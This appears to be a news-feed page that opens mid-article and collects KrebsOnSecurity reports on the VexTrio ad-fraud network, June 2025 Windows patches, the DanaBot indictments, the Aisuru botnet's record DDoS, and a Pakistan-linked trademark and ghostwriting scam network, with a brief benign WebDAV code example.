Incredibly, Cerutti threatened to sue me for defamation before I’d even uttered his name or sent him a request for comment (Cerutti sent the unsolicited legal threat back in January after his company and my name were merely tagged in an Infoblox post on LinkedIn about VexTrio).

Asked to comment on the findings by Qurium and Infoblox, Cerutti vehemently denied being associated with VexTrio. Cerutti asserted that his companies all strictly adhere to the regulations of the countries in which they operate, and that they have been completely transparent about all of their operations.

“We are a group operating in the advertising and marketing space, with an affiliate network program,” Cerutti responded. “I am not [going] to say we are perfect, but I strongly declare we have no connection with VexTrio at all.”

“Unfortunately, as a big player in this space we also get to deal with plenty of publisher fraud, sketchy traffic, fake clicks, bots, hacked, listed and resold publisher accounts, etc, etc.,” Cerutti continued. “We bleed lots of money to such malpractices and conduct regular internal screenings and audits in a constant battle to remove bad traffic sources. It is also a highly competitive space, where some upstarts will often play dirty against more established mainstream players like us.”

Working with Qurium, researchers at the security firm Infoblox released details about VexTrio’s infrastructure to their industry partners. Just four days after Qurium published its findings, LosPollos announced it was suspending its push monetization service. Less than a month later, Adspro had rebranded to Aimed Global.

A mind map illustrating some of the key findings and connections in the Infoblox and Qurium investigations. Click to enlarge.

A REVEALING PIVOT

In March 2025, researchers at GoDaddy chronicled how DollyWay — a malware strain that has consistently redirected victims to VexTrio throughout its eight years of activity — suddenly stopped doing that on November 20, 2024. Virtually overnight, DollyWay and several other malware families that had previously used VexTrio began pushing their traffic through another TDS called Help TDS.

Digging further into historical DNS records and the unique code scripts used by the Help TDS, Infoblox determined it has long enjoyed an exclusive relationship with VexTrio (at least until LosPollos ended its push monetization service in November).

In a report released today, Infoblox said an exhaustive analysis of the JavaScript code, website lures, smartlinks and DNS patterns used by VexTrio and Help TDS linked them with at least four other TDS operators (not counting TacoLoco). Those four entities — Partners House, BroPush, RichAds and RexPush — are all Russia-based push monetization programs that pay affiliates to drive signups for a variety of schemes, but mostly online dating services.

“As Los Pollos push monetization ended, we’ve seen an increase in fake CAPTCHAs that drive user acceptance of push notifications, particularly from Partners House,” the Infoblox report reads. “The relationship of these commercial entities remains a mystery; while they are certainly long-time partners redirecting traffic to one another, and they all have a Russian nexus, there is no overt common ownership.”

Renee Burton, vice president of threat intelligence at Infoblox, said the security industry generally treats the deceptive methods used by VexTrio and other malicious TDSs as a kind of legally grey area that is mostly associated with less dangerous security threats, such as adware and scareware.

But Burton argues that this view is myopic and helps perpetuate a dark adtech industry that also pushes plenty of straight-up malware, noting that every year hundreds of thousands of compromised websites around the world redirect victims to the tangled web of VexTrio and VexTrio-affiliated TDSs.

“These TDSs are a nefarious threat, because they’re the ones you can connect to the delivery of things like information stealers and scams that cost consumers billions of dollars a year,” Burton said. “From a larger strategic perspective, my takeaway is that Russian organized crime has control of malicious adtech, and these are just some of the many groups involved.”

WHAT CAN YOU DO?

As KrebsOnSecurity warned way back in 2020, it’s a good idea to be very sparing in approving notifications when browsing the Web. In many cases these notifications are benign, but as we’ve seen there are numerous dodgy firms that are paying site owners to install their notification scripts, and then reselling that communications pathway to scammers and online hucksters.

If you’d like to prevent sites from ever presenting notification requests, all of the major browser makers let you do this — either across the board or on a per-website basis. While it is true that blocking notifications entirely can break the functionality of some websites, doing this for any devices you manage on behalf of your less tech-savvy friends or family members might end up saving everyone a lot of headache down the road.

To modify site notification settings in Mozilla Firefox, navigate to Settings, Privacy & Security, Permissions, and click the “Settings” tab next to “Notifications.” That page will display any notifications already permitted and allow you to edit or delete any entries. Tick the box next to “Block new requests asking to allow notifications” to stop them altogether.

In Google Chrome, click the icon with the three dots to the right of the address bar, scroll all the way down to Settings, Privacy and Security, Site Settings, and Notifications. Select the “Don’t allow sites to send notifications” button if you want to banish notification requests forever.

In Apple’s Safari browser, go to Settings, Websites, and click on Notifications in the sidebar. Uncheck the option to “allow websites to ask for permission to send notifications” if you wish to turn off notification requests entirely.

Patch Tuesday, June 2025 Edition

Microsoft today released security updates to fix at least 67 vulnerabilities in its Windows operating systems and software. Redmond warns that one of the flaws is already under active attack, and that software blueprints showing how to exploit a pervasive Windows bug patched this month are now public.

The sole zero-day flaw this month is CVE-2025-33053, a remote code execution flaw in the Windows implementation of WebDAV — an HTTP extension that lets users remotely manage files and directories on a server. While WebDAV isn’t enabled by default in Windows, its presence in legacy or specialized systems still makes it a relevant target, said Seth Hoyt, senior security engineer at Automox.
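
WebDAV itself is unremarkable: it layers extra methods such as PROPFIND, MKCOL and MOVE on top of ordinary HTTP so that clients can list, create and move files on a remote server, and the Windows WebClient service exists to make exactly that kind of request. The sketch below, which lists a directory on a hypothetical WebDAV share via PROPFIND, is offered only to illustrate the protocol; it has nothing to do with the exploit itself, and the URL is a placeholder.

```typescript
// Minimal WebDAV usage example: list a directory's contents with PROPFIND.
async function listWebDavDirectory(url: string): Promise<string> {
  const response = await fetch(url, {
    method: "PROPFIND",      // a WebDAV method layered on top of plain HTTP
    headers: { Depth: "1" }, // ask for the collection's immediate children only
  });

  // Successful PROPFIND responses arrive as 207 Multi-Status, which still
  // falls inside fetch's "ok" range of 200-299.
  if (!response.ok) {
    throw new Error(`PROPFIND failed with status ${response.status}`);
  }
  return response.text(); // XML describing the files and folders found
}

// Placeholder URL for illustration only.
listWebDavDirectory("https://example.com/dav/")
  .then((xml) => console.log(xml))
  .catch((err) => console.error(err));
```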

Adam Barnett, lead software engineer at Rapid7, said Microsoft’s advisory for CVE-2025-33053 does not mention that the Windows implementation of WebDAV has been listed as deprecated since November 2023, which in practical terms means that the WebClient service no longer starts by default.

“The advisory also has attack complexity as low, which means that exploitation does not require preparation of the target environment in any way that is beyond the attacker’s control,” Barnett said. “Exploitation relies on the user clicking a malicious link. It’s not clear how an asset would be immediately vulnerable if the service isn’t running, but all versions of Windows receive a patch, including those released since the deprecation of WebClient, like Server 2025 and Windows 11 24H2.”

Microsoft warns that an “elevation of privilege” vulnerability in the Windows Server Message Block (SMB) client (CVE-2025-33073) is likely to be exploited, given that proof-of-concept code for this bug is now public. CVE-2025-33073 has a CVSS risk score of 8.8 (out of 10), and exploitation of the flaw leads to the attacker gaining “SYSTEM” level control over a vulnerable PC.

“What makes this especially dangerous is that no further user interaction is required after the initial connection—something attackers can often trigger without the user realizing it,” said Alex Vovk, co-founder and CEO of Action1. “Given the high privilege level and ease of exploitation, this flaw poses a significant risk to Windows environments. The scope of affected systems is extensive, as SMB is a core Windows protocol used for file and printer sharing and inter-process communication.”

Beyond these highlights, 10 of the vulnerabilities fixed this month were rated “critical” by Microsoft, including eight remote code execution flaws.

Notably absent from this month’s patch batch is a fix for a newly discovered weakness in Windows Server 2025 that allows attackers to act with the privileges of any user in Active Directory. The bug, dubbed “BadSuccessor,” was publicly disclosed by researchers at Akamai on May 21, and several public proof-of-concepts are now available. Tenable’s Satnam Narang said organizations that have at least one Windows Server 2025 domain controller should review permissions for principals and limit those permissions as much as possible.

Adobe has released updates for Acrobat Reader and six other products addressing at least 259 vulnerabilities, most of them in an update for Experience Manager. Mozilla Firefox and Google Chrome both recently released security updates that require a restart of the browser to take effect. The latest Chrome update fixes two zero-day exploits in the browser (CVE-2025-5419 and CVE-2025-4664).

For a detailed breakdown on the individual security updates released by Microsoft today, check out the Patch Tuesday roundup from the SANS Internet Storm Center. Action1 has a breakdown of patches from Microsoft and a raft of other software vendors releasing fixes this month. As always, please back up your system and/or data before patching, and feel free to drop a note in the comments if you run into any problems applying these updates.

Cybercriminals Are Hiding Malicious Web Traffic in Plain Sight

In an effort to evade detection, cybercriminals are increasingly turning to “residential proxy” services that cover their tracks by making it look like everyday online activity.

What Really Happened in the Aftermath of the Lizard Squad Hacks

On Christmas Day in 2014 hackers knocked out the Xbox and PlayStation gaming networks, impacting how video game companies handled cybersecurity for years.

Oops: DanaBot Malware Devs Infected Their Own PCs

The U.S. government today unsealed criminal charges against 16 individuals accused of operating and selling DanaBot, a prolific strain of information-stealing malware that has been sold on Russian cybercrime forums since 2018. The FBI says a newer version of DanaBot was used for espionage, and that many of the defendants exposed their real-life identities after accidentally infecting their own systems with the malware.

DanaBot’s features, as promoted on its support site. Image: welivesecurity.com.

Initially spotted in May 2018 by researchers at the email security firm Proofpoint, DanaBot is a malware-as-a-service platform that specializes in credential theft and banking fraud.

Today, the U.S. Department of Justice unsealed a criminal complaint and indictment from 2022, which said the FBI identified at least 40 affiliates who were paying between $3,000 and $4,000 a month for access to the information stealer platform.

The government says the malware infected more than 300,000 systems globally, causing estimated losses of more than $50 million. The ringleaders of the DanaBot conspiracy are named as Aleksandr Stepanov, 39, a.k.a. “JimmBee,” and Artem Aleksandrovich Kalinkin, 34, a.k.a. “Onix”, both of Novosibirsk, Russia. Kalinkin is an IT engineer for the Russian state-owned energy giant Gazprom. His Facebook profile name is “Maffiozi.”

According to the FBI, there were at least two major versions of DanaBot; the first was sold between 2018 and June 2020, when the malware stopped being offered on Russian cybercrime forums. The government alleges that the second version of DanaBot — emerging in January 2021 — was provided to co-conspirators for use in targeting military, diplomatic and non-governmental organization computers in several countries, including the United States, Belarus, the United Kingdom, Germany, and Russia.

“Unindicted co-conspirators would use the Espionage Variant to compromise computers around the world and steal sensitive diplomatic communications, credentials, and other data from these targeted victims,” reads a grand jury indictment dated Sept. 20, 2022. “This stolen data included financial transactions by diplomatic staff, correspondence concerning day-to-day diplomatic activity, as well as summaries of a particular country’s interactions with the United States.”

The indictment says the FBI in 2022 seized servers used by the DanaBot authors to control their malware, as well as the servers that stored stolen victim data. The government said the server data also show numerous instances in which the DanaBot defendants infected their own PCs, resulting in their credential data being uploaded to stolen data repositories that were seized by the feds.

“In some cases, such self-infections appeared to be deliberately done in order to test, analyze, or improve the malware,” the criminal complaint reads. “In other cases, the infections seemed to be inadvertent – one of the hazards of committing cybercrime is that criminals will sometimes infect themselves with their own malware by mistake.”

Image: welivesecurity.com

A statement from the DOJ says that as part of today’s operation, agents with the Defense Criminal Investigative Service (DCIS) seized the DanaBot control servers, including dozens of virtual servers hosted in the United States. The government says it is now working with industry partners to notify DanaBot victims and help remediate infections. The statement credits a number of security firms with providing assistance to the government, including ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Team CYMRU, and ZScaler.

It’s not unheard of for financially-oriented malicious software to be repurposed for espionage. A variant of the ZeuS Trojan, which was used in countless online banking attacks against companies in the United States and Europe between 2007 and at least 2015, was for a time diverted to espionage tasks by its author.

As detailed in this 2015 story, the author of the ZeuS trojan created a custom version of the malware to serve purely as a spying machine, which scoured infected systems in Ukraine for specific keywords in emails and documents that would likely only be found in classified documents.

The public charging of the 16 DanaBot defendants comes a day after Microsoft joined a slew of tech companies in disrupting the IT infrastructure for another malware-as-a-service offering — Lumma Stealer, which is likewise offered to affiliates under tiered subscription prices ranging from $250 to $1,000 per month. Separately, Microsoft filed a civil lawsuit to seize control over 2,300 domain names used by Lumma Stealer and its affiliates.

Further reading:

Danabot: Analyzing a Fallen Empire

ZScaler blog: DanaBot Launches DDoS Attack Against the Ukrainian Ministry of Defense

Flashpoint: Operation Endgame DanaBot Malware

Team CYMRU: Inside DanaBot’s Infrastructure: In Support of Operation Endgame II

March 2022 criminal complaint v. Artem Aleksandrovich Kalinkin

September 2022 grand jury indictment naming the 16 defendants

KrebsOnSecurity Hit With Near-Record 6.3 Tbps DDoS

KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test run for a massive new Internet of Things (IoT) botnet capable of launching crippling digital assaults that few web destinations can withstand. Read on for more about the botnet, the attack, and the apparent creator of this global menace.

For reference, the 6.3 Tbps attack last week was ten times the size of the assault launched against this site in 2016 by the Mirai IoT botnet, which held KrebsOnSecurity offline for nearly four days. The 2016 assault was so large that Akamai – which was providing pro-bono DDoS protection for KrebsOnSecurity at the time — asked me to leave their service because the attack was causing problems for their paying customers.

Since the Mirai attack, KrebsOnSecurity.com has been behind the protection of Project Shield, a free DDoS defense service that Google provides to websites offering news, human rights, and election-related content. Google Security Engineer Damian Menscher told KrebsOnSecurity the May 12 attack was the largest Google has ever handled. In terms of sheer size, it is second only to a very similar attack that Cloudflare mitigated and wrote about in April.

After comparing notes with Cloudflare, Menscher said the botnet that launched both attacks bears the fingerprints of Aisuru, a digital siege machine that first surfaced less than a year ago. Menscher said the attack on KrebsOnSecurity lasted less than a minute, hurling large UDP data packets at random ports at a rate of approximately 585 million data packets per second.

“It was the type of attack normally designed to overwhelm network links,” Menscher said, referring to the throughput connections between and among various Internet service providers (ISPs). “For most companies, this size of attack would kill them.”

A graph depicting the 6.5 Tbps attack mitigated by Cloudflare in April 2025. Image: Cloudflare.

The Aisuru botnet comprises a globally-dispersed collection of hacked IoT devices, including routers, digital video recorders and other systems that are commandeered via default passwords or software vulnerabilities. As documented by researchers at QiAnXin XLab, the botnet was first identified in an August 2024 attack on a large gaming platform.

Aisuru reportedly went quiet after that exposure, only to reappear in November with even more firepower and software exploits. In a January 2025 report, XLab found the new and improved Aisuru (a.k.a. “Airashi“) had incorporated a previously unknown zero-day vulnerability in Cambium Networks cnPilot routers.

NOT FORKING AROUND

The people behind the Aisuru botnet have been peddling access to their DDoS machine in public Telegram chat channels that are closely monitored by multiple security firms. In August 2024, the botnet was rented out in subscription tiers ranging from $150 per day to $600 per week, offering attacks of up to two terabits per second.

“You may not attack any measurement walls, healthcare facilities, schools or government sites,” read a notice posted on Telegram by the Aisuru botnet owners in August 2024.

Interested parties were told to contact the Telegram handle “@yfork” to purchase a subscription. The account @yfork previously used the nickname “Forky,” an identity that has been posting to public DDoS-focused Telegram channels since 2021.

According to the FBI, Forky’s DDoS-for-hire domains have been seized in multiple law enforcement operations over the years. Last year, Forky said on Telegram he was selling the domain stresser[.]best, which saw its servers seized by the FBI in 2022 as part of an ongoing international law enforcement effort aimed at diminishing the supply of and demand for DDoS-for-hire services.

“The operator of this service, who calls himself ‘Forky,’ operates a Telegram channel to advertise features and communicate with current and prospective DDoS customers,” reads an FBI seizure warrant (PDF) issued for stresser[.]best. The FBI warrant stated that on the same day the seizures were announced, Forky posted a link to a story on this blog that detailed the domain seizure operation, adding the comment, “We are buying our new domains right now.”

A screenshot from the FBI’s seizure warrant for Forky’s DDoS-for-hire domains shows Forky announcing the resurrection of their service at new domains.

Approximately ten hours later, Forky posted again, including a screenshot of the stresser[.]best user dashboard, instructing customers to use their saved passwords for the old website on the new one.

A review of Forky’s posts to public Telegram channels — as indexed by the cyber intelligence firms Unit 221B and Flashpoint — reveals a 21-year-old individual who claims to reside in Brazil [full disclosure: Flashpoint is currently an advertiser on this blog].

Since late 2022, Forky’s posts have frequently promoted a DDoS mitigation company and ISP that he operates called botshield[.]io. The Botshield website is connected to a business entity registered in the United Kingdom called Botshield LTD, which lists a 21-year-old woman from Sao Paulo, Brazil as the director. Internet routing records indicate Botshield (AS213613) currently controls several hundred Internet addresses that were allocated to the company earlier this year.

Domaintools.com reports that botshield[.]io was registered in July 2022 to a Kaike Southier Leite in Sao Paulo. A LinkedIn profile by the same name says this individual is a network specialist from Brazil who works in “the planning and implementation of robust network infrastructures, with a focus on security, DDoS mitigation, colocation and cloud server services.”

MEET FORKY

Image: Jaclyn Vernace / Shutterstock.com.

In his posts to public Telegram chat channels, Forky has hardly attempted to conceal his whereabouts or identity. In countless chat conversations indexed by Unit 221B, Forky could be seen talking about everyday life in Brazil, often remarking on the extremely low or high prices in Brazil for a range of goods, from computer and networking gear to narcotics and food.

Reached via Telegram, Forky claimed he was “not involved in this type of illegal actions for years now,” and that the project had been taken over by other unspecified developers. Forky initially told KrebsOnSecurity he had been out of the botnet scene for years, only to concede this wasn’t true when presented with public posts on Telegram from late last year that clearly showed otherwise.

Forky denied being involved in the attack on KrebsOnSecurity, but acknowledged that he helped to develop and market the Aisuru botnet. Forky claims he is now merely a staff member for the Aisuru botnet team, and that he stopped running the botnet roughly two months ago after starting a family. Forky also said the woman named as director of Botshield is related to him.

Forky offered equivocal, evasive responses to a number of questions about the Aisuru botnet and his business endeavors. But on one point he was crystal clear:

“I have zero fear about you, the FBI, or Interpol,” Forky said, asserting that he is now almost entirely focused on his hosting business — Botshield.

Forky declined to discuss the makeup of his ISP’s clientele, or to clarify whether Botshield was more of a hosting provider or a DDoS mitigation firm. However, Forky has posted on Telegram about Botshield successfully mitigating large DDoS attacks launched against other DDoS-for-hire services.

DomainTools finds the same Sao Paulo street address in the registration records for botshield[.]io was used to register several other domains, including cant-mitigate[.]us. The email address in the WHOIS records for that domain is forkcontato@gmail.com, which DomainTools says was used to register the domain for the now-defunct DDoS-for-hire service stresser[.]us, one of the domains seized in the FBI’s 2023 crackdown.

On May 8, 2023, the U.S. Department of Justice announced the seizure of stresser[.]us, along with a dozen other domains offering DDoS services. The DOJ said ten of the 13 domains were reincarnations of services that were seized during a prior sweep in December, which targeted 48 top stresser services (also known as “booters”).

Forky claimed he could find out who attacked my site with Aisuru. But when pressed a day later on the question, Forky said he’d come up empty-handed.

“I tried to ask around, all the big guys are not retarded enough to attack you,” Forky explained in an interview on Telegram. “I didn’t have anything to do with it. But you are welcome to write the story and try to put the blame on me.”

THE GHOST OF MIRAI

The 6.3 Tbps attack last week caused no visible disruption to this site, in part because it was so brief — lasting approximately 45 seconds. DDoS attacks of such magnitude and brevity typically are produced when botnet operators wish to test or demonstrate their firepower for the benefit of potential buyers. Indeed, Google’s Menscher said it is likely that both the May 12 attack and the slightly larger 6.5 Tbps attack against Cloudflare last month were simply tests of the same botnet’s capabilities.

In many ways, the threat posed by the Aisuru/Airashi botnet is reminiscent of Mirai, an innovative IoT malware strain that emerged in the summer of 2016 and successfully out-competed virtually all other IoT malware strains in existence at the time.

As first revealed by KrebsOnSecurity in January 2017, the Mirai authors were two U.S. men who co-ran a DDoS mitigation service — even as they were selling far more lucrative DDoS-for-hire services using the most powerful botnet on the planet.

Less than a week after the Mirai botnet was used in a days-long DDoS against KrebsOnSecurity, the Mirai authors published the source code to their botnet so that they would not be the only ones in possession of it in the event of their arrest by federal investigators.

Ironically, the leaking of the Mirai source is precisely what led to the eventual unmasking and arrest of the Mirai authors, who went on to serve probation sentences that required them to consult with FBI investigators on DDoS investigations. But that leak also rapidly led to the creation of dozens of Mirai botnet clones, many of which were harnessed to fuel their own powerful DDoS-for-hire services.

Menscher told KrebsOnSecurity that as counterintuitive as it may sound, the Internet as a whole would probably be better off if the source code for Aisuru became public knowledge. After all, he said, the people behind Aisuru are in constant competition with other IoT botnet operators who are all striving to commandeer a finite number of vulnerable IoT devices globally.

Such a development would almost certainly cause a proliferation of Aisuru botnet clones, he said, but at least then the overall firepower from each individual botnet would be greatly diminished — or at least within range of the mitigation capabilities of most DDoS protection providers.

Barring a source code leak, Menscher said, it would be nice if someone published the full list of software exploits being used by the Aisuru operators to grow their botnet so quickly.

“Part of the reason Mirai was so dangerous was that it effectively took out competing botnets,” he said. “This attack somehow managed to compromise all these boxes that nobody else knows about. Ideally, we’d want to see that fragmented out, so that no [individual botnet operator] controls too much.”

Simplifying Zero Trust: How Cisco Security Suites Drive Value

Discover how Cisco Security Suites are helping organizations achieve zero trust while realizing significant cost savings, improved productivity, and a 110% ROI.

What to Expect When You’re Convicted

When a formerly incarcerated “troubleshooter for the mafia” looked for a second career he chose the thing he knew best. He became a prison consultant for white-collar criminals.

Developing With Cisco XDR at Cisco Live San Diego ‘25

Join us at Cisco Live San Diego to explore Cisco XDR’s latest innovations, including custom integrations, AI automation, and community features. Don’t miss out!

US Customs and Border Protection Plans to Photograph Everyone Exiting the US by Car

A CBP spokesperson tells WIRED that the agency plans to expand its program for real-time face recognition at the border, potentially aiding Trump administration efforts to track people who self-deport.

Pakistani Firm Shipped Fentanyl Analogs, Scams to US

A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.

In an indictment (PDF) unsealed last month, the U.S. Department of Justice said Dallas-based eWorldTrade “operated an online business-to-business marketplace that facilitated the distribution of synthetic opioids such as isotonitazene and carfentanyl, both significantly more potent than fentanyl.”

Launched in 2017, eWorldTrade[.]com now features a seizure notice from the DOJ. eWorldTrade operated as a wholesale seller of consumer goods, including clothes, machinery, chemicals, automobiles and appliances. The DOJ’s indictment includes no additional details about eWorldTrade’s business, origins or other activity, and at first glance the website might appear to be a legitimate e-commerce platform that also just happened to sell some restricted chemicals.

A screenshot of the eWorldTrade homepage on March 25, 2025. Image: archive.org.

However, an investigation into the company’s founders reveals they are connected to a sprawling network of websites that have a history of extortionate scams involving trademark registration, book publishing, exam preparation, and the design of logos, mobile applications and websites.

Records from the U.S. Patent and Trademark Office (USPTO) show the eWorldTrade mark is owned by an Azneem Bilwani in Karachi (this name also is in the registration records for the now-seized eWorldTrade domain). Mr. Bilwani is perhaps better known as the director of the Pakistan-based IT provider Abtach Ltd., which has been singled out by the USPTO and Google for operating trademark registration scams (the main offices for eWorldtrade and Abtach share the same address in Pakistan).

In November 2021, the USPTO accused Abtach of perpetrating “an egregious scheme to deceive and defraud applicants for federal trademark registrations by improperly altering official USPTO correspondence, overcharging application filing fees, misappropriating the USPTO’s trademarks, and impersonating the USPTO.”

Abtach offered trademark registration at suspiciously low prices compared to legitimate costs of over USD $1,500, and claimed they could register a trademark in 24 hours. Abtach reportedly rebranded to Intersys Limited after the USPTO banned Abtach from filing any more trademark applications.

In a note published to its LinkedIn profile, Intersys Ltd. asserted last year that certain scam firms in Karachi were impersonating the company.

FROM AXACT TO ABTACH

Many of Abtach’s employees are former associates of a similar company in Pakistan called Axact that was targeted by Pakistani authorities in a 2015 fraud investigation. Axact came under law enforcement scrutiny after The New York Times ran a front-page story about the company’s most lucrative scam business: Hundreds of sites peddling fake college degrees and diplomas.

People who purchased fake certifications were subsequently blackmailed by Axact employees posing as government officials, who would demand additional payments under threats of prosecution or imprisonment for having bought fraudulent “unauthorized” academic degrees. This practice created a continuous cycle of extortion, internally referred to as “upselling.”

“Axact took money from at least 215,000 people in 197 countries — one-third of them from the United States,” The Times reported. “Sales agents wielded threats and false promises and impersonated government officials, earning the company at least $89 million in its final year of operation.”

Dozens of top Axact employees were arrested, jailed, held for months, tried and sentenced to seven years for various fraud violations. But a 2019 research brief on Axact’s diploma mills found none of those convicted had started their prison sentence, and that several had fled Pakistan and never returned.

“In October 2016, a Pakistan district judge acquitted 24 Axact officials at trial due to ‘not enough evidence’ and then later admitted he had accepted a bribe (of $35,209) from Axact,” reads a history (PDF) published by the American Association of Collegiate Registrars and Admissions Officers.

In 2021, Pakistan’s Federal Investigation Agency (FIA) charged Bilwani and nearly four dozen others — many of them Abtach employees — with running an elaborate trademark scam. The authorities called it “the biggest money laundering case in the history of Pakistan,” and named a number of businesses based in Texas that allegedly helped move the proceeds of cybercrime.

A page from the March 2021 FIA report alleging that Digitonics Labs and Abtach employees conspired to extort and defraud consumers.

The FIA said the defendants operated a large number of websites offering low-cost trademark services to customers, before then “ignoring them after getting the funds and later demanding more funds from clients/victims in the name of up-sale (extortion).” The Pakistani law enforcement agency said that about 75 percent of customers received fake or fabricated trademarks as a result of the scams.

The FIA found Abtach operates in conjunction with a Karachi firm called Digitonics Labs, which earned a monthly revenue of around $2.5 million through the “extortion of international clients in the name of up-selling, the sale of fake/fabricated USPTO certificates, and the maintaining of phishing websites.”

According to the Pakistani authorities, the accused also ran countless scams involving ebook publication and logo creation, wherein customers are subjected to advance-fee fraud and extortion — with the scammers demanding more money for supposed “copyright release” and threatening to release the trademark.

Also charged by the FIA was Junaid Mansoor, the owner of Digitonics Labs in Karachi. Mansoor’s U.K.-registered company Maple Solutions Direct Limited has run at least 700 ads for logo design websites since 2015, the Google Ads Transparency page reports. The company has approximately 88 ads running on Google as of today. 

Junaid Mansoor. Source: youtube/@Olevels․com School.

Mr. Mansoor is actively involved with and promoting a Quran study business called quranmasteronline[.]com, which was founded by Junaid’s brother Qasim Mansoor (Qasim is also named in the FIA criminal investigation). The Google ads promoting quranmasteronline[.]com were paid for by the same account advertising a number of scam websites selling logo and web design services. 

Junaid Mansoor did not respond to requests for comment. An address in Teaneck, New Jersey where Mr. Mansoor previously lived is listed as an official address of exporthub[.]com, a Pakistan-based e-commerce website that appears remarkably similar to eWorldTrade (Exporthub says its offices are in Texas). Interestingly, a search in Google for this domain shows ExportHub currently features multiple listings for fentanyl citrate from suppliers in China and elsewhere.

The CEO of Digitonics Labs is Muhammad Burhan Mirza, a former Axact official who was arrested by the FIA as part of its money laundering and trademark fraud investigation in 2021. In 2023, prosecutors in Pakistan charged Mirza, Mansoor and 14 other Digitonics employees with fraud, impersonating government officials, phishing, cheating and extortion. Mirza’s LinkedIn profile says he currently runs an educational technology/life coach enterprise called TheCoach360, which purports to help young kids “achieve financial independence.”

Reached via LinkedIn, Mr. Mirza denied having anything to do with eWorldTrade or any of its sister companies in Texas.

“Moreover, I have no knowledge as to the companies you have mentioned,” said Mr. Mirza, who did not respond to follow-up questions.

The current disposition of the FIA’s fraud case against the defendants is unclear. The investigation was marred early on by allegations of corruption and bribery. In 2021, Pakistani authorities alleged Bilwani paid a six-figure bribe to FIA investigators. Meanwhile, attorneys for Mr. Bilwani have argued that although their client did pay a bribe, the payment was solicited by government officials. Mr. Bilwani did not respond to requests for comment.

THE TEXAS NEXUS

KrebsOnSecurity has learned that the people and entities at the center of the FIA investigations have built a significant presence in the United States, with a strong concentration in Texas. The Texas businesses promote websites that sell logo and web design, ghostwriting, and academic cheating services. Many of these entities have recently been sued for fraud and breach of contract by angry former customers, who claimed the companies relentlessly upsold them while failing to produce the work as promised.

For example, the FIA complaints named Retrocube LLC and 360 Digital Marketing LLC, two entities that share a street address with eWorldTrade: 1910 Pacific Avenue, Suite 8025, Dallas, Texas. Also incorporated at that Pacific Avenue address is abtach[.]ae, a web design and marketing firm based in Dubai; and intersyslimited[.]com, the new name of Abtach after they were banned by the USPTO. Other businesses registered at this address market services for logo design, mobile app development, and ghostwriting.

A list published in 2021 by Pakistan’s FIA of different front companies allegedly involved in scamming people who are looking for help with trademarks, ghostwriting, logos and web design.

360 Digital Marketing’s website 360digimarketing[.]com is owned by an Abtach front company called Abtech LTD. Meanwhile, business records show 360 Digi Marketing LTD is a U.K. company whose officers include former Abtach director Bilwani; Muhammad Saad Iqbal, formerly Abtach, now CEO of Intersys Ltd; Niaz Ahmed, a former Abtach associate; and Muhammad Salman Yousuf, formerly a vice president at Axact, Abtach, and Digitonics Labs.

Google’s Ads Transparency Center finds 360 Digital Marketing LLC ran at least 500 ads promoting various websites selling ghostwriting services. Another entity tied to Junaid Mansoor — a company called Octa Group Technologies AU — has run approximately 300 Google ads for book publishing services, promoting confusingly named websites like amazonlistinghub[.]com and barnesnoblepublishing[.]co.

360 Digital Marketing LLC ran approximately 500 ads for scam ghostwriting sites.

Rameez Moiz is a Texas resident and former Abtach product manager who has represented 360 Digital Marketing LLC and RetroCube. Moiz told KrebsOnSecurity he stopped working for 360 Digital Marketing in the summer of 2023. Mr. Moiz did not respond to follow-up questions, but an Upwork profile for him states that as of April 2025 he is employed by Dallas-based Vertical Minds LLC.

In April 2025, California resident Melinda Will sued the Texas firm Majestic Ghostwriting — which is doing business as ghostwritingsquad[.]com —  alleging they scammed her out of $100,000 after she hired them to help write her book. Google’s ad transparency page shows Moiz’s employer Vertical Minds LLC paid to run approximately 55 ads for ghostwritingsquad[.]com and related sites.

Google’s ad transparency listing for ghostwriting ads paid for by Vertical Minds LLC.

VICTIMS SPEAK OUT

Ms. Will’s lawsuit is just one of more than two dozen complaints over the past four years wherein plaintiffs sued one of this group’s web design, wiki editing or ghostwriting services. In 2021, a New Jersey man sued Octagroup Technologies, alleging they ripped him off when he paid a total of more than $26,000 for the design and marketing of a web-based mapping service.

The plaintiff in that case did not respond to requests for comment, but his complaint alleges Octagroup and myriad other companies it contracted with produced minimal work product despite subjecting him to relentless upselling. That case was decided in favor of the plaintiff because the defendants never contested the matter in court.

In 2023, 360 Digital Marketing LLC and Retrocube LLC were sued by a woman who said they scammed her out of $40,000 over a book she wanted help writing. That lawsuit helpfully showed an image of the office front door at 1910 Pacific Ave Suite 8025, which featured the logos of 360 Digital Marketing, Retrocube, and eWorldTrade.

The front door at 1910 Pacific Avenue, Suite 8025, Dallas, Texas.

The lawsuit was filed pro se by Leigh Riley, a 64-year-old career IT professional who paid 360 Digital Marketing to have a company called Talented Ghostwriter co-author and promote a series of books she’d outlined on spirituality and healing.

“The main reason I hired them was because I didn’t understand what I call the formula for writing a book, and I know there’s a lot of marketing that goes into publishing,” Riley explained in an interview. “I know nothing about that stuff, and these guys were convincing that they could handle all aspects of it. Until I discovered they couldn’t write a damn sentence in English properly.”

Riley’s well-documented lawsuit (not linked here because it features a great deal of personal information) includes screenshots of conversations with the ghostwriting team, which was constantly assigning her to new writers and editors, and ghosting her on scheduled conference calls about progress on the project. Riley said she ended up writing most of the book herself because the work they produced was unusable.

“Finally after months of promising the books were printed and on their way, they show up at my doorstep with the wrong title on the book,” Riley said. When she demanded her money back, she said the people helping her with the website to promote the book locked her out of the site.

A conversation snippet from Leigh Riley’s lawsuit against Talented Ghostwriter, aka 360 Digital Marketing LLC. “Other companies once they have you money they don’t even respond or do anything,” the ghostwriting team manager explained.

Riley decided to sue, naming 360 Digital Marketing LLC and Retrocube LLC, among others.  The companies offered to settle the matter for $20,000, which she accepted. “I didn’t have money to hire a lawyer, and I figured it was time to cut my losses,” she said.

Riley said she could have saved herself a great deal of headache by doing some basic research on Talented Ghostwriter, whose website claims the company is based in Los Angeles. According to the California Secretary of State, however, there is no registered entity by that name. Rather, the address claimed by talentedghostwriter[.]com is a vacant office building with a “space available” sign in the window.

